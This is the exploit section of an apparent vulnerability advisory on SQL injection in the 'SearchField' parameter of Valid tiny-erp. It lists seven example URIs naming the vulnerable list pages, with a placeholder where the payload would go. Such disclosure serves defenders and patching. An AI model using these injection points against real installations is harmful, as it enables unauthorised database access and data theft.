• info
• discussion
• exploit
• solution
• references

Valid tiny-erp 'SearchField' Parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/validerp/_partner_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/proioncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/_rantevou_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/syncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/synallasomenos_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/ypelaton_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/yproion_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]